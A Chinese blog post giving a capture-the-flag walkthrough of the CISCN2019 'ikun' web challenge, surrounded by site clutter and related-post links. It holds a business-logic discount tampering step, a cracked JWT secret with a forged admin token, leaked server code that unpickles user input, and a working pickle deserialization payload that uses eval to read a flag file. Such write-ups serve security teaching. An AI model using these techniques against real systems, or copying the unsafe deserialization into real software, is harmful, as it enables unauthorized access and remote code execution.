[CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2022-11-14 23:01:00 发布
最新推荐文章于 2022-11-14 23:01:00 发布
阅读量1.2k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41628669/article/details/106133124
版权

知识点

  • 逻辑漏洞
  • jwt签名
  • pickle反序列化

在这里插入图片描述

 

题目要求买lv6,写个脚本找一下

 

#coding:utf-8
import requests
import time
for i in range(1,200):
    print(i)
    url = 'http://1ecaa26f-c825-4bf8-861a-a2b0f2a73316.node3.buuoj.cn/shop?page={}'.format(i)
    r = requests.get(url)
    if 'lv6.png' in r.text:
        print(i)
        break
    if r.status_code == 429:
        print("too fast")
        time.sleep(2)

 

 

Iv6在第181页


在这里插入图片描述

 

特别贵,点进去购买,抓包看一下。当然,别忘了先注册个账号。


在这里插入图片描述
在这里插入图片描述

 

看到discount为0.8,将其修改的小一点,注意,这里不能修改成0


在这里插入图片描述

 

需要admin权限
这里注意到有jwt签名,在使用c-jwt-crack爆破一下密钥,这工具github上有


在这里插入图片描述

 

这里看到密钥为1Kun
https://jwt.io/上伪造一份admin的签名


在这里插入图片描述

 

伪造后的签名为

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo

 


修改签名后重放一下,看到提示www.zip源码泄露


在这里插入图片描述

 

获取源码后打开,注意到Admin.py文件

 

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

 

这里的become先进行一次url解码,再进行pickle反序列化
构造一下pickle反序列化

 

# coding:utf-8 
#version:python2.7
import pickle
import urllib

class Test(object):
    def __reduce__(self):
        return (eval, ("open('/flag.txt','r').read()" ,))

a = Test()
s = pickle.dumps(a)
print(urllib.quote(s))
#c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.

 

回到刚刚的大会员页面,点击一键成为大会员,并进行抓包,修改become的值


在这里插入图片描述

 

参考[CISCN2019 华北赛区 Day1 Web2]ikun

「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【2019 CISCN华北赛区Day1 Web2】ikun
weixin_61951055的博客
11-08 789
2019 CISCN华北赛区Day1 Web2 WriteUp (全国大学生信息安全竞赛)
[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化
sGanYu
05-22 1243
这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤 先去注册一个账户 注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了 这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
2. **favicon.ico** - 这是一个图标文件,通常显示在浏览器的地址栏、书签和标签页上,代表网站的标识。在这个案例中,它可能是坤坤或ikun相关的设计,以增加网站的辨识度。 3. **static** - 这个文件夹名通常用于...
ikun.exe
10-19
ikun.exe
测试一下你是不是IKUN
10-05
标题“测试一下你是不是IKUN”暗示这可能是一个与编程挑战或测试相关的项目,而描述中的“代码秀:你干嘛!!!哎呦!!!”则带有轻松、互动的氛围,可能是通过编写C++代码来实现某种特定功能或者解决一个问题。...
ikun电脑桌面宠物.exe
09-22
ikun电脑桌面宠物.exe
GT2大师探索版C02ROOT工具箱-1.exe
11-24
GT2大师探索版C02ROOT工具箱-1.exe
CISCN2019_华北赛区_Day1_Web2]ikun_1通关手册
No_1_is_me的博客
11-14 1900
CISCN2019_华北赛区_Day1_Web2]ikun_1通关手册
[CISCN2019 华北赛区 Day1 Web2]ikun 1
weixin_43940853的博客
03-16 567
写一个python脚本 import requests url = 'http://c8f78f51-2593-4b2a-8e72-f39543bc99dd.node3.buuoj.cn/shop?page={}' for i in range(1000): r = requests.get(url.format(str(i))) if 'lv6.png' in r.text: ...
[CISCN2019 华北赛区 Day2 Web1]Hack World
wuuconix's blog
04-02 4237
[CISCN2019 华北赛区 Day2 Web1]Hack World 这道题的考点貌似是sql盲注还是第一次遇到这种类型,表示太难了。。 主界面 它的意思是让我们给出文章的id,那我们就输入一试试。 有回显,出题人想要一个girlfriend。对此,我只想说,想peach。然后我们再输入2试试。 对这个回显,我怀疑出题人妄想症犯了。之后我们再输入3试试。 发生了错误,我们再输入万能密码试试。 好吧,它检测到sql注入了,以我目前的知识,我已经手足无措了,在网上查阅资
CTRL-IKun团队选题报告
didao2792的博客
09-25 318
1. 团队简介 1.1团队名称:CTRL-IKun 1.2队员学号列表 姓名 学号列表 廖志丹 201731032125 王川 201731021132 江天宇 201731024132 张微玖 201731024126 宋杰 201731024120 1.3 队员简介 姓名 简介 廖志丹 技术骨干,编程主力,拥有丰富的编程知识,才思敏捷...
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8487
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
CISCN 华北赛区 Day1 Web2
kid的博客
06-14 2568
CISCN 华北赛区 Day1 Web2 前言 关注大佬的博客看到大佬又做了一道有意思的题还提供了环境,这里来体验下。 一看这个网站就很有意思…最近黑kunkun的可真多,前面0708那个漏洞github搜exp,下下来一运行 ,输出你打篮球真的很像CXK…过分…你打篮球才像CXK,你们全家打篮球都像CXK! 复现环境:https://github.com/CTFTraining/CISCN...
ikun python
最新发布
10-08
ikun python是指使用Python编写的一些项目或功能,其中包括ikun飞机大战和ikun音乐播放器。ikun飞机大战是一个使用Python和tkinter库开发的游戏,而ikun音乐播放器则是使用Python的tkinter和pygame库开发的一个音乐...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值